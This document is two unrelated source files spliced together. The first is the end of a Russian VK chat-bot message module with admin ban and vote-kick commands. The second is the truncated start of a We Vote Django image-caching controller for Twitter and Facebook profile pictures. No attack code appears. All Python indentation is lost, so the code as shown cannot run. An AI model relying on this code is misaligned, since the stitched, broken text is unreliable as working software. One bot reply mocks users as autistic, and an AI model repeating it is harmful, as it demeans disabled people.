- !unban ID_ПОЛЬЗОВАТЕЛЯ [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - разблокировать пользователя
- !addinbanlist ID_ПОЛЬЗОВАТЕЛЯ [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - принудительно добавить пользователя в бан-лист
- !setvotecount кол-во [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - устанавливает минимальное количество человек, необходимое для голосования (по дефолту 5)
- !setvotetime время [ТОЛЬКО ДЛЯ АДМИНИСТРАТОРОВ БЕСЕДЫ] - устанавливает время, необходимое для голосования (по дефолту 2 минуты)
Со временем функционал бота будет пополняться.'''
authors = 'Авторы бота: [id136385345|Сашка Панкратьев] и [id138738887|Лёшка Лепёшка]'
unban_user = prefix + '{0} разбанен(а). Можете возвращать в беседу!'
no_votes_cast = prefix + 'Не набрано достаточное количетсво голосов (Набрано: {0}, необходимо: {1}).\nТак что пользователь остается в беседе... Пока что...'
# Константные
you_have_autism = prefix + 'У ВАС АУТИЗМ, ВЫ ДАЖЕ ЧИСЛО НОРМАЛЬНОЕ ВВЕСТИ НЕ МОЕЖЕТЕ :('
settime = prefix + 'Я установил время голосование, равное: {0} минут(ам)'
setvote = prefix + 'Я установил кол-во голосов, равное: {0} '
can_not_kick_user = prefix + 'Ошибка: Не могу выгнать этого пользователя'
user_is_admin = prefix + 'Ошибка: Пользователь является администратором'
user_not_in_chat = prefix + 'Ошибка: Пользователь не в беседе'
user_not_found = prefix + 'Ошибка: Такого пользователя не существует'
err_vote_for_yourself = prefix + 'Ошибка: Нельзя голосовать самому за себя!'
no_rights_for_kicks = prefix + 'Не могу выгнать пользователя. Скорее всего, меня лишили прав администратора'
no_user_in_banlist = prefix + 'Ошибка: Такого юзера нету в бан-листе...'
banned_user_came_in = prefix + 'Ну вот мы и встретились...'
user_excluded = prefix + 'Пользователь исключен'
user_leave = prefix + 'Этот говнюк ливнул. Зайдет - кикну'
user_remains = prefix + 'Пользователь остается в беседе... Пока что...'
no_admin_rights = prefix + 'Ошибка: У меня нет прав администратора'
voting_is_active = prefix + 'Ошибка: Голосвание уже идет.'
you_are_not_admin = prefix + 'Ошибка: Вы не администратор.'
banned_list = prefix + 'СПИСОК ЗАБАНЕННЫХ ПОЛЬЗОВАТЕЛЕЙ: \n\n'
banlist_empty = prefix + 'Бан-лист пуст.'
user_added_in_banlist = prefix + 'Пользователь добавлен в бан-лист.'
user_already_in_banlist = prefix + 'Ошибка: Пользователь уже в бан-листе'
my_uptime = prefix + 'UPTIME: \n'
time_format = '{0} дней, {1} часов, {2} минут, {3} секунд'
|
# image/controllers.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
import requests
import wevote_functions.admin
from .functions import analyze_remote_url, analyze_image_file, analyze_image_in_memory
from .models import WeVoteImageManager, WeVoteImage, \
CHOSEN_FAVICON_NAME, CHOSEN_LOGO_NAME, CHOSEN_SOCIAL_SHARE_IMAGE_NAME, \
FACEBOOK_PROFILE_IMAGE_NAME, FACEBOOK_BACKGROUND_IMAGE_NAME, \
TWITTER_PROFILE_IMAGE_NAME, TWITTER_BACKGROUND_IMAGE_NAME, TWITTER_BANNER_IMAGE_NAME, MAPLIGHT_IMAGE_NAME, \
VOTE_SMART_IMAGE_NAME, MASTER_IMAGE, ISSUE_IMAGE_NAME, BALLOTPEDIA_IMAGE_NAME, CAMPAIGNX_PHOTO_IMAGE_NAME, \
LINKEDIN_IMAGE_NAME, WIKIPEDIA_IMAGE_NAME
from candidate.models import CandidateManager
from config.base import get_environment_variable
from django.db.models import Q
from import_export_facebook.models import FacebookManager
from issue.models import IssueManager
from organization.models import OrganizationManager
from politician.models import PoliticianManager
from position.controllers import reset_all_position_image_details_from_candidate, \
reset_position_for_friends_image_details_from_voter, reset_position_entered_image_details_from_organization, \
update_all_position_details_from_candidate
from twitter.functions import retrieve_twitter_user_info
from twitter.models import TwitterUserManager
from voter.models import VoterManager, VoterDeviceLink, VoterDeviceLinkManager, VoterAddressManager, VoterAddress, Voter
from voter_guide.models import VoterGuideManager
from wevote_functions.functions import positive_value_exists, convert_to_int
logger = wevote_functions.admin.get_logger(__name__)
HTTP_OK = 200
# These constants are used for "image_source" which is not a WeVoteImage table value, but gets used in the controller
# to set the table values like: kind_of_image_twitter_profile and kind_of_image_facebook_profile
# code. "other_source" is a database table value that is not given its own "kind_of_image..." table boolean
TWITTER = "twitter"
FACEBOOK = "facebook"
MAPLIGHT = "maplight"
VOTE_SMART = "vote_smart"
BALLOTPEDIA_IMAGE_SOURCE = "ballotpedia"
LINKEDIN = "linkedin"
WIKIPEDIA = "wikipedia"
OTHER_SOURCE = "other_source" # Set "kind_of_image_other_source" to true
MAPLIGHT_URL_NOT_FOUND = "maplight url not found"
VOTE_SMART_URL_NOT_FOUND = "votesmart url not found"
BALLOTPEDIA_URL_NOT_FOUND = "ballotpedia url not found"
CAMPAIGNX_PHOTO_URL_NOT_FOUND = "campaignx photo url not found"
LINKEDIN_URL_NOT_FOUND = "linkedin url not found"
WIKIPEDIA_URL_NOT_FOUND = "wikipedia url not found"
OTHER_SOURCE_URL_NOT_FOUND = "other source url not found"
FACEBOOK_USER_DOES_NOT_EXIST = "facebook user does not exist"
FACEBOOK_URL_NOT_FOUND = "facebook url not found"
TWITTER_USER_DOES_NOT_EXIST = "twitter user does not exist"
TWITTER_URL_NOT_FOUND = "twitter url not found"
IMAGE_ALREADY_CACHED = "image already cached"
ALL_KIND_OF_IMAGE = ['kind_of_image_twitter_profile', 'kind_of_image_twitter_background',
'kind_of_image_twitter_banner', 'kind_of_image_facebook_profile',
'kind_of_image_facebook_background', 'kind_of_image_maplight', 'kind_of_image_vote_smart']
# Search for in campaign/controllers.py as well
# Facebook shared image: 1200 x 630
# Facebook shared link: 1200 x 628
# Tweet with image in shared link: 1200 x 628
# Tweet with single image: 1200 x 675 (Twitter recommended aspect ratio is 16:9)
CAMPAIGN_PHOTO_ORIGINAL_MAX_WIDTH = 1200
CAMPAIGN_PHOTO_ORIGINAL_MAX_HEIGHT = 628
CAMPAIGN_PHOTO_LARGE_MAX_WIDTH = 575
CAMPAIGN_PHOTO_LARGE_MAX_HEIGHT = 301
CAMPAIGN_PHOTO_MEDIUM_MAX_WIDTH = 224
CAMPAIGN_PHOTO_MEDIUM_MAX_HEIGHT = 117
CAMPAIGN_PHOTO_SMALL_MAX_WIDTH = 140
CAMPAIGN_PHOTO_SMALL_MAX_HEIGHT = 73
PROFILE_IMAGE_LARGE_WIDTH = convert_to_int(get_environment_variable("PROFILE_IMAGE_LARGE_WIDTH"))
PROFILE_IMAGE_LARGE_HEIGHT = convert_to_int(get_environment_variable("PROFILE_IMAGE_LARGE_HEIGHT"))
PROFILE_IMAGE_MEDIUM_WIDTH = convert_to_int(get_environment_variable("PROFILE_IMAGE_MEDIUM_WIDTH"))
PROFILE_IMAGE_MEDIUM_HEIGHT = convert_to_int(get_environment_variable("PROFILE_IMAGE_MEDIUM_HEIGHT"))
PROFILE_IMAGE_TINY_WIDTH = convert_to_int(get_environment_variable("PROFILE_IMAGE_TINY_WIDTH"))
PROFILE_IMAGE_TINY_HEIGHT = convert_to_int(get_environment_variable("PROFILE_IMAGE_TINY_HEIGHT"))
ISSUES_IMAGE_LARGE_WIDTH = convert_to_int(get_environment_variable("ISSUES_IMAGE_LARGE_WIDTH"))
ISSUES_IMAGE_LARGE_HEIGHT = convert_to_int(get_environment_variable("ISSUES_IMAGE_LARGE_HEIGHT"))
ISSUES_IMAGE_MEDIUM_WIDTH = convert_to_int(get_environment_variable("ISSUES_IMAGE_MEDIUM_WIDTH"))
ISSUES_IMAGE_MEDIUM_HEIGHT = convert_to_int(get_environment_variable("ISSUES_IMAGE_MEDIUM_HEIGHT"))
ISSUES_IMAGE_TINY_WIDTH = convert_to_int(get_environment_variable("ISSUES_IMAGE_TINY_WIDTH"))
ISSUES_IMAGE_TINY_HEIGHT = convert_to_int(get_environment_variable("ISSUES_IMAGE_TINY_HEIGHT"))
AWS_STORAGE_BUCKET_NAME = get_environment_variable("AWS_STORAGE_BUCKET_NAME")
try:
SOCIAL_BACKGROUND_IMAGE_WIDTH = convert_to_int(get_environment_variable("SOCIAL_BACKGROUND_IMAGE_WIDTH"))
SOCIAL_BACKGROUND_IMAGE_HEIGHT = convert_to_int(get_environment_variable("SOCIAL_BACKGROUND_IMAGE_HEIGHT"))
except Exception:
# In case not defined in a dev environment, use the default values which come from the Sept 2017 size of the react
# image class="organization-banner-image-img"
logger.error(
"SOCIAL_BACKGROUND_IMAGE_WIDTH and/or SOCIAL_BACKGROUND_IMAGE_HEIGHT not defined in environment_variables.")
SOCIAL_BACKGROUND_IMAGE_HEIGHT = 200 # HTML x
SOCIAL_BACKGROUND_IMAGE_WIDTH = 900 # HTML y
def cache_all_kind_of_images_locally_for_all_organizations():
"""
Cache all kind of images locally for all organizations
:return:
"""
cache_images_locally_for_all_organizations_results = []
# TODO Update this for organizations
# voter_list = Voter.objects.all()
#
# # If there is a value in twitter_id OR facebook_id, return the voter
# image_filters = []
# new_filter = Q(twitter_id__isnull=False)
# image_filters.append(new_filter)
# new_filter = Q(facebook_id__isnull=False)
# image_filters.append(new_filter)
#
# # Add the first query
# final_filters = image_filters.pop()
#
# # ...and "OR" the remaining items in the list
# for item in image_filters:
# final_filters |= item
#
# # voter_list = voter_list.filter(final_filters)
# voter_list = voter_list.order_by('-is_admin', '-is_verified_volunteer', 'facebook_email', 'twitter_screen_name',
# 'last_name', 'first_name')
# voter_list = voter_list[:200] # Limit to 200 for now
#
# for voter in voter_list:
# cache_images_for_one_organization_results = migrate_remote_voter_image_urls_to_local_cache(voter.id)
# cache_images_locally_for_all_organizations_results.append(cache_images_for_one_organization_results)
return cache_images_locally_for_all_organizations_results
def cache_all_kind_of_images_locally_for_all_voters():
"""
Cache all kind of images locally for all voters
:return:
"""
cache_images_locally_for_all_voters_results = []
voter_list = Voter.objects.all()
# If there is a value in twitter_id OR facebook_id, return the voter
image_filters = []
new_filter = Q(twitter_id__isnull=False)
image_filters.append(new_filter)
new_filter = Q(facebook_id__isnull=False)
image_filters.append(new_filter)
# Add the first query
final_filters = image_filters.pop()
# ...and "OR" the remaining items in the list
for item in image_filters:
final_filters |= item
# voter_list = voter_list.filter(final_filters)
voter_list = voter_list.order_by('-is_admin', '-is_verified_volunteer', 'facebook_email', 'twitter_screen_name',
'last_name', 'first_name')
voter_list = voter_list[:200] # Limit to 200 for now
for voter in voter_list:
cache_images_for_a_voter_results = cache_voter_master_images(voter.id)
cache_images_locally_for_all_voters_results.append(cache_images_for_a_voter_results)
return cache_images_locally_for_all_voters_results
def cache_image_if_not_cached(
google_civic_election_id=0,
image_url_https='',
voter_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
issue_we_vote_id=None,
twitter_id=None,
twitter_screen_name=None,
facebook_user_id=None,
maplight_id=None,
vote_smart_id=None,
is_active_version=False,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_issue=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
kind_of_image_original=False,
facebook_background_image_offset_x=None,
facebook_background_image_offset_y=None,
other_source=None):
"""
Check if image is already cached or not. If not then cached it.
:param google_civic_election_id:
:param image_url_https:
:param voter_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param issue_we_vote_id:
:param twitter_id:
:param twitter_screen_name:
:param facebook_user_id:
:param maplight_id:
:param vote_smart_id:
:param is_active_version:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_issue:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param kind_of_image_original:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:param other_source:
:return:
"""
we_vote_image_manager = WeVoteImageManager()
cached_we_vote_image_results = we_vote_image_manager.retrieve_recent_cached_we_vote_image(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
is_active_version=True)
# If recent cached image matches with the current one the image is already cached
cached_we_vote_image = cached_we_vote_image_results['we_vote_image']
if cached_we_vote_image_results['we_vote_image_found'] and \
image_url_https == cached_we_vote_image.twitter_profile_image_url_https or \
image_url_https == cached_we_vote_image.twitter_profile_background_image_url_https or \
image_url_https == cached_we_vote_image.twitter_profile_banner_url_https or \
image_url_https == cached_we_vote_image.facebook_profile_image_url_https or \
image_url_https == cached_we_vote_image.facebook_background_image_url_https or \
image_url_https == cached_we_vote_image.maplight_image_url_https or \
image_url_https == cached_we_vote_image.vote_smart_image_url_https or \
image_url_https == cached_we_vote_image.issue_image_url_https or \
image_url_https == cached_we_vote_image.ballotpedia_profile_image_url or \
image_url_https == cached_we_vote_image.linkedin_profile_image_url or \
image_url_https == cached_we_vote_image.wikipedia_profile_image_url or \
image_url_https == cached_we_vote_image.other_source_image_url:
cache_image_results = IMAGE_ALREADY_CACHED
else:
# Image is not cached so caching it
cache_image_locally_results = cache_image_locally(
google_civic_election_id=google_civic_election_id,
image_url_https=image_url_https,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
twitter_screen_name=twitter_screen_name,
is_active_version=is_active_version,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y,
other_source=other_source,
)
cache_image_results = cache_image_locally_results['success']
if cache_image_results:
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
image_url_https=image_url_https,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,)
return cache_image_results
def cache_organization_master_images(organization_we_vote_id):
"""
Cache all kind of master images for an organization such as profile, background
:param organization_we_vote_id:
:return:
"""
cache_all_kind_of_images_results = {
'organization_we_vote_id': "",
'cached_twitter_profile_image': False,
'cached_twitter_background_image': False,
'cached_twitter_banner_image': False,
'cached_facebook_profile_image': False,
'cached_facebook_background_image': False
}
google_civic_election_id = 0
twitter_id = None
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(organization_we_vote_id)
if not organization_results['organization_found']:
return cache_all_kind_of_images_results
organization = organization_results['organization']
organization_we_vote_id = organization.we_vote_id
if positive_value_exists(organization_we_vote_id):
cache_all_kind_of_images_results['organization_we_vote_id'] = organization_we_vote_id
else:
return cache_all_kind_of_images_results
twitter_user_manager = TwitterUserManager()
twitter_screen_name = ''
twitter_link_to_organization_results = \
twitter_user_manager.retrieve_twitter_link_to_organization_from_organization_we_vote_id(organization_we_vote_id)
if twitter_link_to_organization_results['twitter_link_to_organization_found']:
twitter_link_to_organization = twitter_link_to_organization_results['twitter_link_to_organization']
twitter_id = twitter_link_to_organization.twitter_id
twitter_screen_name = twitter_link_to_organization.fetch_twitter_handle_locally_or_remotely()
if not positive_value_exists(twitter_id):
cache_all_kind_of_images_results = {
'organization_we_vote_id': organization_we_vote_id,
'organization': organization,
'cached_twitter_profile_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_background_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_banner_image': TWITTER_USER_DOES_NOT_EXIST,
}
return cache_all_kind_of_images_results
# Retrieve latest twitter image urls from Twitter
latest_image_urls_results = retrieve_image_urls_from_twitter(twitter_id)
twitter_profile_image_url_https = latest_image_urls_results['latest_twitter_profile_image_url']
twitter_profile_background_image_url_https = latest_image_urls_results['latest_twitter_background_image_url']
twitter_profile_banner_url_https = latest_image_urls_results['latest_twitter_banner_image_url']
# Cache all images if not already cached
if not twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_image_url_https, organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id, twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_profile=True, kind_of_image_original=True)
if not twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_background_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_background_image_url_https,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_background=True, kind_of_image_original=True)
if not twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_banner_url_https,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_banner=True, kind_of_image_original=True)
return cache_all_kind_of_images_results
def cache_voter_master_images(voter_id):
"""
Cache all kind of images locally for a voter such as profile, background
:param voter_id:
:return:
"""
cache_all_kind_of_images_results = {
'voter_id': voter_id,
'voter_we_vote_id': "",
'cached_twitter_profile_image': False,
'cached_twitter_background_image': False,
'cached_twitter_banner_image': False,
'cached_facebook_profile_image': False,
'cached_facebook_background_image': False
}
google_civic_election_id = 0
twitter_id = None
facebook_id = None
voter_address_manager = VoterAddressManager()
voter_manager = VoterManager()
voter_device_link_manager = VoterDeviceLinkManager()
voter_results = voter_manager.retrieve_voter_by_id(voter_id)
if not voter_results['voter_found']:
return cache_all_kind_of_images_results
voter = voter_results['voter']
if positive_value_exists(voter.we_vote_id):
cache_all_kind_of_images_results['voter_we_vote_id'] = voter.we_vote_id
# DALE 2018-06-19 I don't see why we need a google_civic_election_id for storing a voter's photos
voter_device_link_results = voter_device_link_manager.retrieve_voter_device_link(0, voter_id=voter_id)
if voter_device_link_results['success']:
voter_device_link = voter_device_link_results['voter_device_link']
else:
voter_device_link = VoterDeviceLink()
voter_address_results = voter_address_manager.retrieve_address(0, voter_id)
if voter_address_results['voter_address_found']:
voter_address = voter_address_results['voter_address']
else:
voter_address = VoterAddress()
from ballot.controllers import choose_election_from_existing_data
results = choose_election_from_existing_data(voter_device_link, 0, voter_address)
google_civic_election_id = results['google_civic_election_id']
else:
return cache_all_kind_of_images_results
# DALE NOTE 2017-04-23 I don't think we want to use the twitter_id stored in the voter table
# if positive_value_exists(voter.twitter_id):
# twitter_id = voter.twitter_id
# else:
twitter_user_manager = TwitterUserManager()
twitter_screen_name = ''
twitter_link_to_voter_results = twitter_user_manager.retrieve_twitter_link_to_voter_from_voter_we_vote_id(
voter.we_vote_id, read_only=True)
if twitter_link_to_voter_results['twitter_link_to_voter_found']:
twitter_link_to_voter = twitter_link_to_voter_results['twitter_link_to_voter']
twitter_id = twitter_link_to_voter.twitter_id
twitter_screen_name = twitter_link_to_voter.fetch_twitter_handle_locally_or_remotely()
# DALE NOTE 2017-04-23 I don't think we want to use the facebook_id stored in the voter table
# if positive_value_exists(voter.facebook_id):
# facebook_id = voter.facebook_id
# else:
facebook_manager = FacebookManager()
facebook_link_to_voter_results = facebook_manager.retrieve_facebook_link_to_voter_from_voter_we_vote_id(
voter.we_vote_id)
if facebook_link_to_voter_results['facebook_link_to_voter_found']:
facebook_id = facebook_link_to_voter_results['facebook_link_to_voter'].facebook_user_id
if not positive_value_exists(twitter_id) and not positive_value_exists(facebook_id):
cache_all_kind_of_images_results = {
'voter_id': voter_id,
'voter_we_vote_id': voter.we_vote_id,
'voter_object': voter,
'cached_twitter_profile_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_background_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_twitter_banner_image': TWITTER_USER_DOES_NOT_EXIST,
'cached_facebook_profile_image': FACEBOOK_USER_DOES_NOT_EXIST,
'cached_facebook_background_image': FACEBOOK_USER_DOES_NOT_EXIST
}
return cache_all_kind_of_images_results
if not positive_value_exists(twitter_id):
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_USER_DOES_NOT_EXIST,
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_USER_DOES_NOT_EXIST,
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_USER_DOES_NOT_EXIST,
else:
# Retrieve latest twitter image urls from Twitter
latest_image_urls_results = retrieve_image_urls_from_twitter(twitter_id)
twitter_profile_image_url_https = latest_image_urls_results['latest_twitter_profile_image_url']
twitter_profile_background_image_url_https = latest_image_urls_results['latest_twitter_background_image_url']
twitter_profile_banner_url_https = latest_image_urls_results['latest_twitter_banner_image_url']
# Cache all images if not already cached
if not twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_image_url_https,
voter_we_vote_id=voter.we_vote_id,
twitter_id=twitter_id, twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_profile=True, kind_of_image_original=True)
if not twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_background_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_background_image_url_https,
voter_we_vote_id=voter.we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_background=True, kind_of_image_original=True)
if not twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = cache_image_if_not_cached(
google_civic_election_id, twitter_profile_banner_url_https,
voter_we_vote_id=voter.we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_banner=True, kind_of_image_original=True)
if not positive_value_exists(facebook_id):
cache_all_kind_of_images_results['cached_facebook_profile_image'] = FACEBOOK_USER_DOES_NOT_EXIST,
cache_all_kind_of_images_results['cached_facebook_background_image'] = FACEBOOK_USER_DOES_NOT_EXIST,
else:
# Retrieve latest facebook image urls from Facebook
latest_image_urls_results = retrieve_facebook_image_url(facebook_id)
facebook_profile_image_url_https = latest_image_urls_results['facebook_profile_image_url']
facebook_background_image_url_https = latest_image_urls_results['facebook_background_image_url']
# Cache all images if not already cached
if not facebook_profile_image_url_https:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = FACEBOOK_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = cache_image_if_not_cached(
google_civic_election_id, facebook_profile_image_url_https,
voter_we_vote_id=voter.we_vote_id,
facebook_user_id=facebook_id, is_active_version=True,
kind_of_image_facebook_profile=True, kind_of_image_original=True)
if not facebook_background_image_url_https:
cache_all_kind_of_images_results['cached_facebook_background_image'] = FACEBOOK_URL_NOT_FOUND
else:
cache_all_kind_of_images_results['cached_facebook_background_image'] = cache_image_if_not_cached(
google_civic_election_id, facebook_background_image_url_https,
voter_we_vote_id=voter.we_vote_id, facebook_user_id=facebook_id,
is_active_version=True, kind_of_image_facebook_background=True, kind_of_image_original=True)
return cache_all_kind_of_images_results
def cache_image_locally(
google_civic_election_id,
image_url_https,
voter_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
issue_we_vote_id=None,
twitter_id=None,
twitter_screen_name=None,
facebook_user_id=None,
other_source=None,
maplight_id=None,
vote_smart_id=None,
is_active_version=False,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_issue=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
kind_of_image_original=False,
kind_of_image_large=False,
kind_of_image_medium=False,
kind_of_image_tiny=False,
facebook_background_image_offset_x=False,
facebook_background_image_offset_y=False):
"""
Cache one type of image
:param google_civic_election_id:
:param image_url_https:
:param voter_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param issue_we_vote_id:
:param twitter_id:
:param twitter_screen_name:
:param facebook_user_id:
:param other_source: # can be MapLight or VoteSmart
:param maplight_id:
:param vote_smart_id:
:param other_source_profile_image_url: # TODO need to find a way to get this
:param is_active_version:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_issue:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param kind_of_image_original:
:param kind_of_image_large:
:param kind_of_image_medium:
:param kind_of_image_tiny:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_locally = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
# create we_vote_image entry with voter_we_vote_id and google_civic_election_id and kind_of_image
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
google_civic_election_id=google_civic_election_id,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
kind_of_image_large=kind_of_image_large,
kind_of_image_medium=kind_of_image_medium,
kind_of_image_tiny=kind_of_image_tiny,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
